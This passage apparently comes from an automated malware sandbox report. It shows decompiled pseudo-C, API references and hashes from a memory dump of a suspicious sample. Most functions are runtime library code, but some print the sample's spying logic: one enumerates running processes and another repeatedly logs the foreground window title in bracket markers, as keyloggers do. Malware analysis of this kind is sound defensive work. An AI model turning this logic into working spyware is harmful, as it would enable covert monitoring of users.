0x00000000
0x00783ad5
0x00000000
0x00000000
0x00783ad7
0x00783ada
0x00000000
0x00000000
0x00000000
0x00783ada
0x00783a93
0x00783a99
0x00783a99
0x00783a9b
0x00783a9c
0x00783a9d
0x00783a9e
0x00783aa5
0x00783aa8
0x00783aaa
0x00783aab
0x00783aad
0x00783aba
0x00783aba
0x00783abc
0x00783abe
0x00783abf
0x00783ac0
0x00783ac7
0x00783aca
0x00783acc
0x00783acc
0x00000000
0x00783acc
0x00783aaf
0x00783aaf
0x00783ab1
0x00000000
0x00000000
0x00783ab3
0x00000000
0x00000000
0x00783ab5
0x00783ab8
0x00000000
0x00000000
0x00000000
0x00783ab8
0x00783a95
0x00783a97
0x00000000
0x00000000
0x00000000
0x00783a97
0x00783a68
0x00783a6a
0x00000000
0x00000000
0x00000000
0x00783a6a
0x00783a64
0x00000000
0x0078394e
0x00783949
0x00783870
0x00783872
0x00000000
0x00783874
0x0078388a
0x0078388f
0x00783891
0x0078389d
0x007838a3
0x007838a4
0x007838a6
0x007838a8
0x007838b3
0x007838b3
0x007838b6
0x007838b8
0x007838b8
0x007838bb
0x00783893
0x00783893
0x00783893
0x00000000
0x00783891
0x00783840
0x00783840
0x00783847
0x00783848
0x0078384a
0x00783afc
0x00783b00
0x00783b05
0x00783b05
0x00783b14
0x00783b14

APIs

_strrchr.LIBCMT ref: 0078389D
__alldvrm.LIBCMT ref: 00783A9E
__alldvrm.LIBCMT ref: 00783AC0

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
Instruction ID: ad6440ecf94c82f44ac8b6a31ad7e14c614885705b0cea8143f8c5c512f30c84
Opcode Fuzzy Hash: c6ef87be5afec7be64c81fb389682078d407a9cdd0e7a8f7fa33338ae39b2213
Instruction Fuzzy Hash: 3CA17A72A403869FDB25EF1CC8817AEBBE5EF11750F14816DE4C59B282C27C9E41C791

Uniqueness

Uniqueness Score: -1.00%

Function 0079029A, Relevance: 6.2, APIs: 4, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0079029A(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E00785A9E(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E00785A9E(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E00785A9E(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E0077A504()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E00785A9E(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E00788718(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E0077A504())) = 0xd;
							_t30 = E0077A4F1();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E0077F348(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E0077DB54(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E007851E9(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0077A4F1();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E0077A504())) = 0xd;
										}
										L23:
										_t38 = E0077A504();
										E007801F5(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E0077DB54(_t56, _t59, _v12);
							E007801F5(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E0077A504())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E0077A504()));
			}

0x0079029a
0x007902a4
0x007902a7
0x007902ae
0x007902b5
0x007902ba
0x007902bd
0x007902c3
0x007902d6
0x007902dd
0x007902e0
0x007902e2
0x007902e5
0x00000000
0x00000000
0x007902eb
0x007902eb
0x007902ed
0x007902f0
0x007902f2
0x007902f5
0x007903d3
0x007903d3
0x007903d5
0x0079038c
0x00790394
0x0079039e
0x007903a1
0x00790422
0x00790422
0x00790424
0x00000000
0x00790424
0x007903a3
0x007903a8
0x00000000
0x007903a8
0x007903d7
0x007903dd
0x007903e5
0x007903ec
0x007903ef
0x007903f2
0x00000000
0x00000000
0x007903fc
0x00790402
0x00790404
0x00000000
0x00000000
0x0079040b
0x00790411
0x0079041e
0x00000000
0x0079041e
0x007903d9
0x007903db
0x00000000
0x00000000
0x00000000
0x007903db
0x007902fb
0x00790305
0x00790311
0x00790314
0x00790315
0x00790317
0x00790335
0x00790338
0x0079033b
0x0079033c
0x0079033c
0x0079033e
0x00790351
0x00790351
0x00790353
0x00790356
0x0079035b
0x0079035e
0x00790361
0x007903ac
0x007903b1
0x007903b4
0x007903bb
0x007903bb
0x007903c1
0x007903c1
0x007903c9
0x007903cf
0x00000000
0x007903cf
0x00790363
0x00790364
0x00790366
0x00790369
0x0079036b
0x0079036e
0x00790370
0x0079034a
0x0079034a
0x00000000
0x0079034a
0x00790372
0x00000000
0x00000000
0x00000000
0x00790372
0x00790340
0x00000000
0x00000000
0x00790342
0x00790348
0x00000000
0x00000000
0x00000000
0x00790374
0x00790374
0x00790374
0x0079037c
0x00790382
0x00790387
0x0079038a
0x0079038a
0x00000000
0x0079038a
0x0079031e
0x00000000
0x0079031e
0x007902fd
0x007902ff
0x00000000
0x00000000
0x00000000
0x007902ff
0x007902c5
0x00000000

APIs

_free.LIBCMT ref: 007903C9

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ad58bd653046d1e95f88d0711a5d120a2c9a3794c83f158ae1a9422eb7b77352
Instruction ID: c26fed29ba916375b13df8ced3270b512e88e4f89915285e3d89ad73918bed6c
Opcode Fuzzy Hash: ad58bd653046d1e95f88d0711a5d120a2c9a3794c83f158ae1a9422eb7b77352
Instruction Fuzzy Hash: D1410831A20510EFEF247BBCAC89A6E3AB8EF41370F144659F518D6192E67C895097E2

Uniqueness

Uniqueness Score: -1.00%

Function 0077C481, Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0077C481(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0077C5CE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00790BC0(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x7991d8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x7991a4;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00790BC0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00790BC0(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00790BC0(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E0077A504();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E0077A504();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0077695D();
					goto L11;
				}
				_t71 = E0077A504();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0077695D();
				return _t103;
			}

0x0077c48a
0x0077c48f
0x0077c4af
0x0077c4b0
0x0077c4b2
0x0077c4b5
0x0077c4b7
0x0077c4ca
0x0077c4cd
0x0077c4cf
0x0077c4d2
0x0077c4d5
0x0077c4d8
0x0077c4e3
0x0077c4e5
0x0077c4e6
0x0077c4e8
0x0077c504
0x0077c508
0x0077c511
0x0077c516
0x0077c51d
0x0077c52a
0x0077c52f
0x0077c539
0x0077c53e
0x0077c543
0x0077c545
0x0077c54c
0x0077c54e
0x0077c54e
0x0077c553
0x0077c558
0x0077c559
0x0077c55c
0x0077c564
0x0077c564
0x0077c565
0x0077c573
0x0077c57b
0x0077c588
0x0077c589
0x0077c593
0x0077c599
0x0077c5a3
0x0077c5aa
0x0077c5ae
0x0077c5b2
0x0077c5b7
0x0077c5bb
0x0077c5c3
0x0077c5c3
0x0077c5c5
0x0077c5c8
0x00000000
0x0077c55e
0x0077c55e
0x0077c55e
0x0077c55f
0x0077c55f
0x00000000
0x0077c55e
0x0077c55c
0x0077c4ea
0x0077c4f3
0x0077c4f3
0x0077c4fa
0x0077c4fb
0x0077c4fd
0x0077c4fd
0x00000000
0x0077c4fd
0x0077c4ec
0x0077c4f1
0x00000000
0x00000000
0x00000000
0x0077c4f1
0x0077c4da
0x00000000
0x00000000
0x0077c4dc
0x0077c4e1
0x00000000
0x00000000
0x00000000
0x0077c4e1
0x0077c4b9
0x0077c4c0
0x0077c4c1
0x0077c4c3
0x00000000
0x0077c4c3
0x0077c491
0x0077c498
0x0077c499
0x0077c49b
0x00000000

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5f0b8630abf222cd55643df63d4f856d02f5b2c3e502f0e150ca2a2639076ff
Instruction ID: 23f5f4f8a28b6da7aaeb1f0951d05fcd3ec0fefd5e09419fefc4857590a25993
Opcode Fuzzy Hash: a5f0b8630abf222cd55643df63d4f856d02f5b2c3e502f0e150ca2a2639076ff
Instruction Fuzzy Hash: 08410A72600744EFEF259F38CC45B6A7BE9EB88750F20C52EF119DB281D77AA9118780

Uniqueness

Uniqueness Score: -1.00%

Function 00744CAB, Relevance: 6.1, APIs: 4, Instructions: 128
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00744CAB(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __esi;
				void* _t41;
				signed int _t46;
				void* _t70;
				void* _t73;
				void* _t74;
				struct _SECURITY_ATTRIBUTES* _t77;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t106;
				void* _t107;

				_t101 = __edx;
				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_v20 = __ecx;
				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
				E007420D5(_t74,  &_v44);
				_t103 = _a4;
				_t8 = _t105 + 0x4c; // 0x7ac184
				_t41 = _t8;
				while(E00744E51(_t105, E00741F95(_t103),  &_v12, _t41) != 0) {
					_t10 = _t105 + 0x40; // 0x8
					_t46 =  *_t10 & 0x000000ff;
					_v16 = _t46;
					if(_v12 + _t46 <= E00742489()) {
						_t77 = 0;
						__eflags = 0;
					} else {
						_t77 = 1;
						_t73 = E00742489();
						_t105 = _v20;
						_t103 = _a4;
						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
					}
					if(_t77 == 0) {
						_t78 = _v16;
						E00741FD1( &_v44, _t101, _t105, E007442A6(_t103,  &_v68, _v16, 0xffffffff));
						E00741FC7();
						E00741FD1( &_v44, _t101, _t105, E007442A6( &_v44,  &_v68, 0, _v12));
						E00741FC7();
						_t112 = _a12;
						if(_a12 != 0) {
							_t30 = _t105 + 0x1c; // 0x7ac154
							E00741FAD(_t30,  &_v44);
							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a8, _t105, 0, 0);
							_t33 = _t105 + 0x34; // 0x0
							WaitForSingleObject( *_t33, 0xffffffff);
							_t34 = _t105 + 0x34; // 0x0
							CloseHandle( *_t34);
						} else {
							_t107 = _t106 - 0x18;
							E007420EC(_t78, _t107, _t101, _t112,  &_v44);
							_a8(_t105);
							_t106 = _t107 + 0x1c;
						}
						E00741FD1(_t103, _t101, _t105, E007442A6(_t103,  &_v68, _v12 + _t78, 0xffffffff));
						E00741FC7();
						_t70 = E00742489();
						_t38 = _t105 + 0x4c; // 0x7ac184
						_t41 = _t38;
						if(_t70 != 0) {
							continue;
						}
					}
					break;
				}
				return E00741FC7();
			}

0x00744cab
0x00744cb1
0x00744cb7
0x00744cbd
0x00744cc0
0x00744cc4
0x00744cc9
0x00744ccc
0x00744ccc
0x00744ccf
0x00744ceb
0x00744ceb
0x00744cf4
0x00744d00
0x00744d1e
0x00744d1e
0x00744d02
0x00744d04
0x00744d06
0x00744d0e
0x00744d14
0x00744d19
0x00744d19
0x00744d22
0x00744d28
0x00744d3d
0x00744d45
0x00744d5f
0x00744d67
0x00744d6c
0x00744d73
0x00744d8a
0x00744d8d
0x00744d9e
0x00744da1
0x00744dab
0x00744db3
0x00744db6
0x00744dbc
0x00744dbf
0x00744d75
0x00744d75
0x00744d7b
0x00744d81
0x00744d84
0x00744d84
0x00744ddb
0x00744de3
0x00744dea
0x00744df1
0x00744df1
0x00744df4
0x00000000
0x00000000
0x00744df4
0x00000000
0x00744d22
0x00744e08

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,007AC184), ref: 00744D98
CreateThread.KERNEL32 ref: 00744DAB
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00744C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00744DB6
CloseHandle.KERNEL32(00000000,?,?,00744C44,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00744DBF

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: cef5056d676ebe85466f419b7f3c685c513ede8901bcadc36279c2da370a02d8
Instruction ID: 7998ad13909f65e0d6f135be910772a8c2b98a536097372087232c8e6777143c
Opcode Fuzzy Hash: cef5056d676ebe85466f419b7f3c685c513ede8901bcadc36279c2da370a02d8
Instruction Fuzzy Hash: 58414171A00118EFCB10EBA4CC59AFEBBBDFF45320F444519F552A3291DB386A46DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0074D211, Relevance: 6.1, APIs: 4, Instructions: 127
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0074D211(void* __ebx, void* __ecx, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				char _v196;
				char _v220;
				char _v244;
				char _v268;
				char _v292;
				char _v316;
				char _v340;
				char _v864;
				intOrPtr _v892;
				void* _v900;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t48;
				void* _t50;
				void* _t129;
				void* _t130;

				_t77 = __ecx;
				_t76 = __ebx;
				_t129 = __ecx;
				E007420D5(__ebx, __ecx);
				 *0x7abeb4 = E00757614(_t77);
				_t130 = CreateToolhelp32Snapshot(2, 0);
				if(_t130 != 0) {
					_v900 = 0x22c;
					Process32FirstW(_t130,  &_v900);
					while(Process32NextW(_t130,  &_v900) != 0) {
						E0074427F(_t76,  &_v28,  &_v864);
						_t47 = E00757226(_t76,  &_v340, E00757642(_v892) & 0x000000ff);
						_t48 = E00757226(_t76,  &_v316, _v892);
						_t50 = E0075739C(_t76,  &_v268, E00757678( &_v292, _v892));
						E00741FD1(_t129, _t58, _t130, E00745343(_t76,  &_v52, E00742F1D( &_v76, E00745343(_t76,  &_v100, E00742F1D( &_v124, E00745343(_t76,  &_v148, E00742F1D( &_v172, E00745343(_t76,  &_v196, E007474F0(_t76,  &_v220, _t129, __eflags, E0075739C(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x7a061c), _t50), _t129, __eflags, 0x7a061c), _t48), _t129, __eflags, 0x7a061c), _t47), _t129, __eflags, "|"));
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741FC7();
						E00741EF0();
						E00741FC7();
						E00741FC7();
						E00741EF0();
					}
					CloseHandle(_t130);
				}
				return _t129;
			}

0x0074d211
0x0074d211
0x0074d21c
0x0074d21e
0x0074d22c
0x0074d237
0x0074d23b
0x0074d247
0x0074d253
0x0074d3d2
0x0074d268
0x0074d286
0x0074d29d
0x0074d2c1
0x0074d342
0x0074d34a
0x0074d352
0x0074d35a
0x0074d362
0x0074d36d
0x0074d378
0x0074d383
0x0074d38e
0x0074d399
0x0074d3a4
0x0074d3af
0x0074d3ba
0x0074d3c5
0x0074d3cd
0x0074d3cd
0x0074d3e9
0x0074d3e9
0x0074d3f6

APIs

Part of subcall function 00757614: GetCurrentProcess.KERNEL32(?,?,?,007580D1,WinDir,00000000,00000000), ref: 00757625

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074D231
Process32FirstW.KERNEL32(00000000,?), ref: 0074D253
Process32NextW.KERNEL32(00000000,0000022C), ref: 0074D3DA
CloseHandle.KERNEL32(00000000), ref: 0074D3E9

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
String ID:
API String ID: 592884611-0
Opcode ID: 3ca6562c5a2c95f4d8d5ee9b37166b83eb05aef8edf2595b2938f80ac73cb848
Instruction ID: bcf430d4d790f0f29601ec0daf0f8c74a6e7ec8fb74456f908e1ef9b248ce72b
Opcode Fuzzy Hash: 3ca6562c5a2c95f4d8d5ee9b37166b83eb05aef8edf2595b2938f80ac73cb848
Instruction Fuzzy Hash: E1413A31905618DBCB19FB64DC5AAEDB375BF55300F8041A9B40AA7092EF785FCACE90

Uniqueness

Uniqueness Score: -1.00%

Function 00748A51, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00748A51() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t34);
				_t59 = Sleep;
				_t61 = _t35;
				while(1) {
					E00771F00(_t59,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = E00741F95(E00741E49(0x7ac578, _t56, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0074427F(_t34, _t66, _t15);
						_t17 = E00757ABF( &_v2012, _t56);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t56 = E00744405(_t34,  &_v2056, L"\r\n[ ", __eflags, E0074427F(_t34,  &_v2028,  &_v2004));
					E00741EFA(_t61 + 4, _t20, _t61, E007430A6(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
					E00741EF0();
					E00741EF0();
					E00741EF0();
					_t67 = _t65 - 0x18;
					E00747350(_t34, _t67, _t56, __eflags, _t61 + 0x60);
					E00748742(_t61);
					while(1) {
						_t30 = E00741F95(E00741E49(0x7ac578, _t56, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0074427F(_t34, _t68, _t30);
						_t32 = E00757ABF(0, _t56);
						_t64 = _t68 + 0x18;
						__eflags = _t32;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E007495A9(_t34, _t61);
				}
			}

0x00748a54
0x00748a54
0x00748a57
0x00748a5d
0x00748a60
0x00748a66
0x00748a68
0x00748a74
0x00748a79
0x00748a7c
0x00748a8a
0x00748a8f
0x00748a95
0x00748a9e
0x00748aa3
0x00748aa6
0x00748aa8
0x00000000
0x00000000
0x00748aaf
0x00748aaf
0x00748ad6
0x00748ae6
0x00748aef
0x00748af8
0x00748b01
0x00748b06
0x00748b0f
0x00748b16
0x00748b1b
0x00748b29
0x00748b2e
0x00748b34
0x00748b3b
0x00748b40
0x00748b43
0x00748b45
0x00000000
0x00000000
0x00748b49
0x00748b49
0x00748b4f
0x00748b4f

APIs

Part of subcall function 00757ABF: GetForegroundWindow.USER32(75146490,?), ref: 00757ACF
Part of subcall function 00757ABF: GetWindowTextLengthW.USER32(00000000), ref: 00757AD8
Part of subcall function 00757ABF: GetWindowTextW.USER32 ref: 00757B02

Sleep.KERNEL32(000001F4), ref: 00748AAF
Sleep.KERNEL32(00000064), ref: 00748B49

Strings

[ , xrefs: 00748AC7
], xrefs: 00748AB3

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 1a7bd13c4a743fa8f559b387d34be6c2e5df846a4a750d16bbf17c6534a4173b
Instruction ID: c1fb35ae0d55b7e426a69ba70a253c580b2e3c888258ca80c831e94c141376f8
Opcode Fuzzy Hash: 1a7bd13c4a743fa8f559b387d34be6c2e5df846a4a750d16bbf17c6534a4173b
Instruction Fuzzy Hash: 5F21F571A44204EBC608F778DC1FA6F7299AF91740F90452DFA42571D2EF6CAA098693

Uniqueness

Uniqueness Score: -1.00%

Function 0077D288, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0077D288(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x7ab4d4; // 0x0
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E0077F348(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E007801F5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E00787D3F();
									E007801F5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0077d288
0x0077d28b
0x0077d293
0x0077d29c
0x0077d2f1
0x0077d2aa
0x0077d2b0
0x0077d2b4
0x0077d302
0x0077d302
0x0077d2b6
0x0077d2be
0x0077d2c1
0x0077d2c4
0x0077d2fb
0x0077d2fc
0x00000000
0x0077d2c6
0x0077d2d0
0x0077d2dc
0x00000000
0x0077d2de
0x0077d2de
0x0077d2df
0x0077d2e0
0x0077d2e6
0x0077d2eb
0x0077d2ee
0x00000000
0x0077d2ee
0x0077d2dc
0x0077d2c4
0x0077d2f7
0x0077d2fa
0x00000000
0x0077d2fa
0x0077d2f5
0x00000000
0x0077d295
0x0077d299
0x0077d299
0x00000000

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91946935c1da159d4adbfaee391b09a4f1aefb74ea468d857239e070b3a8a1cf
Instruction ID: dd4b152d5932f248a396971d7525cef880c547078a2b3b6950f077d1c89faaff
Opcode Fuzzy Hash: 91946935c1da159d4adbfaee391b09a4f1aefb74ea468d857239e070b3a8a1cf
Instruction Fuzzy Hash: FD01A2B2709216BEEA3126786CC5F7B272DEF813F4B348725F525611D6DE6CCC024260

Uniqueness

Uniqueness Score: -1.00%

Function 0077D307, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0077D307(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
